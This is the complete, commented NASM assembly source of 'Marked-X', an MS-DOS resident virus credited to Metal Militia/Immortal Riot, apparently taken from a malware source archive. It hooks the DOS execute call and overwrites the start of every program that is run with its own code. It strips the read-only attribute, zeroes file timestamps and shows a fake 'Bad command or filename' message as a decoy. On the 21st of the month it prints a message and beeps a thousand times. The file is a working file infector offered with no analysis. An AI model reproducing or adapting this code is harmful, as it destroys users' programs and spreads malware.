MalwareSourceCode/MSDOS/M-Index/Virus.MSDOS.Unknown.markedx.asm

103 lines
4.0 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
; Name: Marked-X
; Author: Metal Militia/Immortal Riot
; Resident: Yes
; Encryption: No
virus segment
assume cs:virus, ds:virus
org 100h
start:
mov ah,2ah ; Function 2Ah: Get System Date
int 21h ; Retrieve date
cmp dl,21 ; DL = Date ( tests against 21st )
je Payload ; Its time for the payload, 21st of month
mov ah,9h ; Function 09h: Print String
mov dx,offset note ; Location of decoy note
int 21h ; Explains why the file will not run.
jmp Go_TSR ; Time to go TSR
Payload:
; The test at the beginning proves it to be the 21st, now to
; drop a bomb on victim.
; Prints the payload message to announce wtf is going on.
mov ah,9h ; Function 09h: Print String to Standard output
mov dx,offset society ; Its the message
int 21h ; Tells DOS to announce our presence
mov cx,1000 ; Print 1000 times
mov ax,0E07h ; Function 0Eh: Teletype output
; 07h = The bell character, makes a beep!
beeper:
int 10h ; Video functions
loop beeper ; Beeps 1000h times, The count in CX
Go_TSR:
jmp tsrdata ; Celebrate! now put us as a TSR in memory
new21:
pushf ; Pushes the Flags Register
cmp ah,4bh ; Function 4Bh: Execute program
jz infect ; If a file is being run, infect it.
jmp short end21 ; If a file is not being run then we
; must head back to the old INT 21h.
infect:
mov ax,4301h ; Function 4301h: Set Attributes
and cl,0feh ; Keeps all File attributes 'cept read-only
int 21h ; Makes the file writeable
mov ax,3d02h ; Function 3D02h: Open File for Read/Write access
int 21h
mov bx,ax ; Puts file handle in BX
push ax ; Push all
push bx
push cx
push dx
push ds
push cs
pop ds
mov ax,4200h ; Move to beginning of victim file
xor cx,cx
cwd
int 21h
mov cx,offset endvir-100h ; Length of area to write
mov ah,40h ; Function 40h: Write to file
mov dx,100h ; Start of Virus
int 21h
cwd ; Set Date/Time
xor cx,cx ; to zero (00-00-00)
mov ax,5701h
int 21h
mov ah,3eh ; Close Victim file
int 21h
x21:
pop ds ; pop all ; Restores all registers
pop dx
pop cx
pop bx
pop ax
end21:
popf ; Pops the flags register to keep it unaltered
db 0eah ; Jumps Far to the old Int 21h handler
old21 dw 0,0 ; Where to store the old INT21
data_1 db 'Marked-X' ; Virus name
db 'Will we ever learn to talk with eachother?' ; Virus poem
db '(c) Metal Militia/Immortal Riot' ; Virus author
society db 'In any country, prison is where society sends it''s',0dh,0ah
db 'failures, but in this country society itself is faily',0dh,0ah
db '$' ; Information note
note db 'Bad command or filename',0dh,0ah
db '$' ; Fake note
tsrdata:
mov ax,3521h ; Function 35??h: Get Interrupt Vector
; AL = INT#
; Returns ES:BX of old Interrupt vector
int 21h ; Find out where INT 21h goes
mov cs:[old21],bx ; Places the Old INT 21h vector into
mov cs:[old21+2],es ; its proper place.
mov dx,offset new21 ; Insertion Point of New INT 21h
mov ax,2521h ; Function 25??h: Set new Int Vector
; AL = INT #
; Makes DS:DX new INT Vector
int 21h ; Coolness
push cs ; CS = Code segment that the PSP of TSR
; progge is located in.
pop ds ; Copy that into DS
mov dx,offset endvir ; Put all of us in memory
int 27h ; Do it, TSR (terminate & stay resident)
endvir label byte ; End of file
virus ends
2021-01-12 23:49:21 +00:00
end start